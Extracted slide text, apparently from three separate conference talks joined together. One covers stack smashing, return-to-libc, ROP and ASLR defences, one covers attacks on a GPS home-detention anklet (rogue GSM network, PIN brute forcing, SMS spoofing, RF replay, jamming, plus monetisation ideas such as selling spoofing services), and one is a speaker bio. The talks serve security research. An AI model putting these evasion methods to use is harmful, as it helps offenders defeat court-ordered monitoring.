bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<return address to >
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<return address to >
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
Part II:
Code Injection
Smashing the Stack (1996)
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to >
<return address to C runtime exit>
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<return address to >
Smashing the Stack (1996)
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to >
<return address to C runtime exit>
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<return address to >
Smashing the Stack (1996)
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to >
<return address to C runtime exit>
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<return address to >
Smashing the Stack (1996)
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to >
<return address to C runtime exit>
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<return address to >
Smashing the Stack (1996)
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to >
<return address to C runtime exit>
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
Smashing the Stack (1996)
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
Smashing the Stack (1996)
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
Paging/Virtual Memory
0xdeadbeef
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
CR3
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
CR3
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
CR3
PDE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
CR3
PDE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
CR3
PDE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
CR3
PDE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
CR3
PDE
PTE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
Page
4096 bytes
CR3
PDE
PTE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
Page
4096 bytes
CR3
PDE
PTE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
Page
4096 bytes
CR3
PDE
PTE
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
Page
4096 bytes
CR3
PDE
PTE
Byte
Paging/Virtual Memory
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
111011101111
(3823)
Page Directory
(1024 entries)
Page Table
(1024 ents)
Page
4096 bytes
CR3
PDE
PTE
Byte
Page Table Entries
32
0
Physical address of next level
Read/
Write
User/
Supervisor
Paging made fast: TLB
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
Paging made fast: TLB
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
Page
(4096 bytes)
Paging made fast: TLB
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
Page
(4096 bytes)
Paging made fast: TLB
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
Page
(4096 bytes)
Paging made fast: TLB
0xdeadbeef
11011110101011011011111011101111
1101111010
(890)
1011011011
(731)
Page
(4096 bytes)
Virtual
Address
Physical
Address
Aggregate
Permissions
TLB Entry:
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
1
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
1
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
1
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
0
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
0
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
~
User/~
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
0
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
~
User/~
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
1
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
~
User/~
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
1
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
~
User/~
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
1
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
~
User/~
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
1
PaX PAGEEXEC (2000)
User/
Supervisor:
Emulates
Non-Exec
Instruction TLB:
Data TLB:
Virtual Addr
Physical Addr
Permission
Virtual Addr
Physical Addr
Permission
Instruction Pointer:
~
User/~
PaX Page Fault Strategy:
if (supervisor page &&
IP on faulting page) {
Terminate
} else {
Set user page in PTE
Prime Data TLB
Set supervisor page in PTE
}
~
User/~
1
Page Level Permissions
User
Supervisor PaX/NX
Not-Writable
Read/Execute
Read
Writable
Read/Write/Execute
Read/Write
For mapped pages:
Part III:
Code Reuse
Return to libc (1997)
...
<Shell code>
<Shell code>
<Shell code>
<Shell code>
<Shell code>
<nop> <nop> <nop> <nop>
<nop> <nop> <nop> <nop>
<nop> <nop> <nop> <nop>
<smashed return address to ~ >
Return to libc (1997)
...
<Shell code>
<Shell code>
<Shell code>
<Shell code>
<Shell code>
<nop> <nop> <nop> <nop>
<nop> <nop> <nop> <nop>
<nop> <nop> <nop> <nop>
<smashed return address to ~ >
Return to libc (1997)
...
sh”
/bas
“/bin
<pointer to >
<dummy value>
<smashed ret to libc system() >
...
<vulnerable buffer>
Return to libc (1997)
...
sh”
/bas
“/bin
<pointer to >
<dummy value>
<smashed ret to libc system() >
...
<vulnerable buffer>
...
<pointer to “/bin/bash”>
<saved return address>
<local variable for system()>
<local variable for system()>
...
...
Return to libc (1997)
...
sh”
/bas
“/bin
<pointer to >
<dummy value>
<smashed ret to libc system() >
...
<vulnerable buffer>
...
<pointer to “/bin/bash”>
<saved return address>
<local variable for system()>
<local variable for system()>
...
...
Return Oriented Programming ('07)
...
<argument popping gadget addr>
<argument 2>
<argument 1>
<argument popping gadget addr>
<gadget addr 2>
<argument 2>
<argument 1>
<argument popping gadget addr>
<gadget addr 1>
push eax
ret
pop eax
ret
pop ebx
ret
mov [ebx],eax
ret
xchg ebx,esp
ret
pop edi
pop ebp
ret
Address Space Layout
Randomization (2003)
0...00
f...ff
Stack
Heap
mmap
Library A
Library B
Library C
Program Code
Stack
Heap
mmap
Library A
Library B
Library C
Program Code
Part IV:
Memory Disclosure
&
Advanced Code Reuse
Offset Fix Ups
Library Relative 0..00
libc
Offset Fix Ups
Library Relative 0..00
libc
Library Relative 0..23:
location of system()
Offset Fix Ups
Library Relative 0..00
libc
Library Relative 0..23:
location of system()
Library Relative 0..46:
location of printf()
Offset Fix Ups
Library Relative 0..00
libc
Library Relative 0..23:
location of system()
Library Relative 0..46:
location of printf()
Randomized Virtual Addr
for printf: 0xdefc0b46
Offset Fix Ups
Library Relative 0..00
libc
Library Relative 0..23:
location of system()
Library Relative 0..46:
location of printf()
Randomized Virtual Addr
for printf: 0xdefc0b46
Randomized Virtual Addr
for system: 0xdefc0b23
Offset Fix Ups
Library Relative 0..00
libc
Library Relative 0..23:
location of system()
Library Relative 0..46:
location of printf()
Randomized Virtual Addr
for printf: 0xdefc0b46
Randomized Virtual Addr
for system: 0xdefc0b23
Fine Grained ASLR
● Smashing the
Gadgets (2012)
● Address Space
Layout Permutation
(2006)
lib-func-a
lib-func-b
lib-func-b
lib-func-f
lib-func-c
lib-func-a
lib-func-d
lib-func-c
lib-func-f
lib-func-d
Function level FG-ASLR:
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
xor ecx, ecx
push eax
push ebx
push ecx
call foo
mov edx, [ebp-4]
mov esi, [ebp-8]
add edx, esi
xor edi, edi
push edx
push esi
push edi
call foo
Just-in-Time Code Reuse (2013)
Code Ptr:
0xdeadbeef
Just-in-Time Code Reuse (2013)
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
Just-in-Time Code Reuse (2013)
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
Just-in-Time Code Reuse (2013)
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
Just-in-Time Code Reuse (2013)
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
4K Page @
0x64616000
Just-in-Time Code Reuse (2013)
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
4K Page @
0x64616000
Just-in-Time Code Reuse (2013)
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
4K Page @
0x64616000
The Value of One Pointer?
Volcano and Hobbit: sold separately.
Part V:
Conceal
&
Forget
C++ Virtual Function Tables
Instance of class Dog
Vtable ptr
Member: name
Member: age
Member: breed
Instance of class Cat
Vtable ptr
Member: name
Member: fav. catnip
Member: sharp claws?
Function ptr: feed()
Function ptr: pet()
Function ptr: sound()
Function ptr: feed()
Function ptr: pet()
Function ptr: sound()
Animal → Dog, Animal → Cat
class Cat : public Animal {
…
void sound() {
printf(“Meow!”);
}
…
}
class Dog : public Animal {
…
void sound() {
printf(“Woof!”);
}
…
}
C++ Virtual Function Tables
Instance of class Dog
Vtable ptr
Member: name
Member: age
Member: breed
Instance of class Cat
Vtable ptr
Member: name
Member: fav. catnip
Member: sharp claws?
Function ptr: feed()
Function ptr: pet()
Function ptr: sound()
Function ptr: feed()
Function ptr: pet()
Function ptr: sound()
Animal → Dog, Animal → Cat
class Cat : public Animal {
…
void sound() {
printf(“Meow!”);
}
…
}
class Dog : public Animal {
…
void sound() {
printf(“Woof!”);
}
…
}
Knights and Knaves
Instance of class Dog
Vtable ptr
Member: name
Member: age
Member: breed
Function ptr: feed()
Function ptr: pet()
Function ptr: sound()
Knights and Knaves
Instance of class Dog
Vtable ptr
Member: name
Member: age
Member: breed
Function ptr: feed()
Function ptr: pet()
Function ptr: sound()
Function ptr? feed()
Function ptr? feed()
Function ptr? feed()
Function ptr? pet()
Function ptr? pet()
Function ptr? pet()
Function ptr? sound()
Function ptr? sound()
Function ptr? sound()
Knights and Knaves
Instance of class Dog
Vtable ptr
Member: name
Member: age
Member: breed
Function ptr? feed()
Function ptr? feed()
Function ptr? feed()
Function ptr? pet()
Function ptr? pet()
Function ptr? pet()
Function ptr? sound()
Function ptr? sound()
Function ptr? sound()
Knights and Knaves
Instance of class Dog
Vtable ptr
Member: name
Member: age
Member: breed
Function ptr? feed()
Function ptr? feed()
Function ptr? feed()
Function ptr? pet()
Function ptr? pet()
Function ptr? pet()
Function ptr? sound()
Function ptr? sound()
Function ptr? sound()
Knights and Knaves
Instance of class Dog
Vtable ptr
Member: name
Member: age
Member: breed
Function ptr? feed()
Function ptr? feed()
Function ptr? feed()
Function ptr? pet()
Function ptr? pet()
Function ptr? pet()
Function ptr? sound()
Function ptr? sound()
Function ptr? sound()
Execute Only Memory
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
Execute Only Memory
Code Ptr:
0xdeadbeef
4K Page @
0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
Necessary vs. Sufficient
● Code reuse requires:
– No ASLR: A priori knowledge of place
– ASLR: A priori knowledge of relative place + runtime
discovery of offset
– FG-ASLR: Runtime discovery of value at discovered
place
● No runtime discovery? No discovery of value or
place and no code to reuse:
– XO-M + FG-ASLR = <3
Elephant in the Room
Two words: memory overhead
https://www.flickr.com/photos/mobilestreetlife/4179063482
Blunting the Edge
● Oxymoron (2014)
– Key idea: call fs:0x100
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
xor ecx, ecx
push eax
push ebx
push ecx
call fs:0x100
...
0x110: jmp ...
0x10c: jmp ...
0x108: jmp ...
0x104: jmp ...
0x100: jmp 0xdefc23defc23
0xfc: jmp ...
0xf8: jmp ...
0xf4: jmp ...
...
Start of fs segment at random addr...
Xen, Linux, & LLVM
● Xen 4.4 introduced PVH mode (Xen 4.5 → PVH
dom0)
– PVH uses Intel Extended Page Tables for PFN →
MFN translations
– EPT supports explicit R/W/E permissions
● Linux mprotect M_EXECUTE & ~M_READ sets
EPT through Xen
– Xen injects violations into Linux #PF handler
● LLVM for FG-ASLR and execute-only codegen
Part VI:
Closing Thoughts
Takeaways
Non-Writable
Readable
EPT ~R
X
Read/Execute
Execute Only
NX
Read
Nothing
Writable
Readable
EPT ~R
X
Read/Write/Execute
Write/Execute
NX
Read/Write
Write
Takeaways
Non-Writable
Readable
EPT ~R
X
Read/Execute
Execute Only
NX
Read
Nothing
Writable
Readable
EPT ~R
X
Read/Write/Execute
Write/Execute
NX
Read/Write
Write
Constant Data
Takeaways
Non-Writable
Readable
EPT ~R
X
Read/Execute
Execute Only
NX
Read
Nothing
Writable
Readable
EPT ~R
X
Read/Write/Execute
Write/Execute
NX
Read/Write
Write
Constant Data
Stack/Heap/mmap
Takeaways
Non-Writable
Readable
EPT ~R
X
Read/Execute
Execute Only
NX
Read
Nothing
Writable
Readable
EPT ~R
X
Read/Write/Execute
Write/Execute
NX
Read/Write
Write
Constant Data
Stack/Heap/mmap
Program/Library
Code
Takeaways
Non-Writable
Readable
EPT ~R
X
Read/Execute
Execute Only
NX
Read
Nothing
Writable
Readable
EPT ~R
X
Read/Write/Execute
Write/Execute
NX
Read/Write
Write
Constant Data
Stack/Heap/mmap
Program/Library
Code
Takeaways
Non-Writable
Readable
EPT ~R
X
Read/Execute
Execute Only
NX
Read
Nothing
Writable
Readable
EPT ~R
X
Read/Write/Execute
Write/Execute
NX
Read/Write
Write
Constant Data
Stack/Heap/mmap
Program/Library
Code
Takeaways
Non-Writable
Readable
EPT ~R
X
Read/Execute
Execute Only
NX
Read
Nothing
Writable
Readable
EPT ~R
X
Read/Write/Execute
Write/Execute
NX
Read/Write
Write
Constant Data
Stack/Heap/mmap
Program/Library
Code
FIN
● Code: <TBD>
● White Paper: <TBD>
● Email: [email protected]
● Twitter: @dsThyth
● PGP:
– 201a 7b59 a15b e5f0 bc37 08d3 bc7f 39b2 dfc0 2d75 | pdf |
How to hack your way
out of home detention
About me
• William “@Amm0nRa” Turner
• @Assurance
Disclaimer:
• I own this system (and 0wn it)
• The following information is for academic
purposes only
• Don’t use this for evil
• If you do, you may go to jail
Home Detention Systems
•
I own this system (and 0wn it)
• Used to monitor 'low risk' criminals in their
homes. e.g.:
• “Woman gets home detention in ‘green card’
immigration scheme” [October 2014, Los
Angeles]
• Private investigator who “hacked” email gets
3 months jail, 6 months home detention [June
2015, New York]
How home detention
systems work
• Older systems ran over phone lines, used
RF for anklet bracelet proximity
• Newer systems use GPS, cell network as
well as short range RF
In America
• “On a normal day some 200,000 people wake
up with a black plastic box strapped to their
leg” – James Kilgore, 2012
• Very hard to even get info
• Social Engineered a 'sample' unit out of a Taiwan
manufacturing company for ~$1k - “GWG International
Inc”
• Different states/police forces use different trackers, difficult
to know if/where this unit is used in the USA.
• Other trackers probably have at least some of the same
vulns
• Lacked detailed manuals - found car tracking system
running same 'OS’ (GS-818 - SAN JOSE TECHNOLOGY, INC)
Getting hold of one
Operation
• GPS for location, home base unit with short range RF,
tamper detection
• Battery life depends on configuration, can be
recharged without removing anklet
• Base unit also has battery to deal with power outages
• Communicates over SMS or GPRS (TCP socket) with
server
• Accepts commands to change settings – username
and password
The System – base unit
The System – base unit
Internals Teardown
Anklet
Anklet:
JTAG Header(?)
Anklet Internals
Cinterion MC551
K9F5608U0D
vibration motor
Anklet Internals
M430F5418
434.01MHz Module
Operation
• Interesting commands/features which can
be set/enabled/triggered:
username
password
network APN
SMS-TCP mode
SMS numbers
status report interval
Geo-Fence coords
buzzer
vibration alert
log to file settings
clear log
fiber optic break detection
reed switch detection
GSM Security
• GSM is encrypted using A5/1 (/2/3)
• Ki embedded in SIM card used to
authenticate SIM, network not
authenticated – well known issue
• Kc is temporary key used to encrypt traffic
• IMEI used as unique ID, phone number only
known by network, not SIM
SDR
• SDR – software defined radio
• BladeRF
YateBTS
• Open source GSM stack – based on
OpenBTS, allows JS scripts to control
network functions
• Can be used to spoof real network. need to
find MCC/MNC of local telcos - illegal
• Faraday cage ($2 roll of tin foil) to block
real telco signal and encourage connecting
to rogue network
MitMing
• If in TCP mode, can simply MitM socket – easy
• If in SMS mode, much harder, but doable
Intercept status
messages
• #username,
$GPRMC,110834.902,V,3750.580,S,14459.1854,E
,0.00,0.00,141014,,*07,ST-1-M27-0-3885mV-50.0
• username – used to auth commands sent to
anklet, sent in status messages
• $GPRMC...*07 is a NMEA standard
“Recommended minimum specific GPS/Transit
data”, GPS cords/timestamp
• 07 is hex checksum on GPS data
Understanding message
• Last part of message: e.g. ST-1-M27-0-
3885mV-50.0
• Not fully decoded, but not required
• Does include: RF beacon code, charging status
• Possibly includes message type, battery
charge, local cell towers
Spoofing SMS
• Many different 'providers'
• costs ~30c per sms
• We will be using smsgang.com
• Must know the number to spoof...
• 3 ways to get it...
Pull SIM card
• Why not just do this normally?
• Replace with another SIM card?
Brute force pin
• Default pin is 0000, start brute force with
dictionary attack
• Need to drop status messages and let anklet
retransmit on real network
• Once pin is found: have full control of device.
To get number, change config to send status to
phone you control
Brute force pin
• Pin must be 4 chars long
• Only allows letters and numbers
• Math.pow(36, 4) == 1,679,616
• “SMS transmission speed of about 30 SMS
messages per minute”
• Around 39 days to try every possible pin
Kraken rainbow tables
• Karsten Nohl (BlackHat 2010)
• Allow reversing Kc of GSM traffic captured from
air using SDR
• Once Kc is known, can decrypt SMS/GPRS/voice
• Can forge messages
• Send forged message to your own phone to get
number
Kraken rainbow tables
• Not able to stop real messages
• But if you have a faraday cage and two SDRs...
• Kc changes often
• Probably have to wait a long time to snoop
command – get pin
“Alcoholics Anonymous”
Live Demo!
• Assume we have the anklet number from one the
attacks I just described
• Faraday cage, spoof network
• Decode message, replace latlngs
• Recalculate checksum, encode
• Script POST to SMS spoof service
• Google map to points, green – delivered to phone,
red – captured by spoofed network
RF Base Unit
• Uses 434.01 MHz
• Frequency Shift Keying (FSK)
• Heartbeat beacon every 10 seconds
Attacks?
• Static – doesn’t change until rebooted
(unknown: unique to each device?)
• Record base station heartbeat with
hackRF/BladeRF/other SDR, replay
BLACK HAT
• DO NOT USE THIS IN THE REAL WORLD
• YOU WON'T MAKE IT TO JAIL
System detection
• War drive scanning for base unit RF beacons
• Slow/expensive – unless you can detect RF from
a long range. Better to use court
docs/newspapers to get names and dox
• Jam base station, cell, gps – cheap, easy – very
illegal
• Spoof real network and brute force pin, take
control of anklet, impersonate user/ crack Kc,
get number, jam real device, spoof fake coords
BLACKHAT/Monetization
• If people break the rules of their sentence,
they normally go to jail.
• Black mail user? How?
• Sell spoofing device/service
• Do 'cyber hit's on people for a fee
Summary
• Home detention systems have issues
• Could be improved – mutal auth,
encryption
• Can't be improved/hard – jamming, user
locating
Future?
• Try to get code exec from malformed SMS?
• Remove IC, dump ROM and look for bugs/backdoors
• Write software 'emulator' for the anklet – pull SIM
and plug into any smartphone
• Use SDR to spoof GPS – see other talk happening
right now…
• Questions?
• I probably ran out of time, so talk to me later | pdf |
Marina Simakov
Yaron Zinar
ABOUT US
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
• Senior Security Researcher @Preempt
• M.Sc. in computer science, with several published articles, with a main area of
expertise in graph theory
• Previously worked as a Security Researcher @Microsoft
• Spoke at various security conferences such as Black Hat, Blue Hat IL and DefCon
Marina Simakov (@simakov_marina)
• Senior Security Researcher Lead @Preempt
• M.Sc. in Computer Science with a focus on statistical analysis
• Spent over 12 years at leading companies such as Google and Microsoft
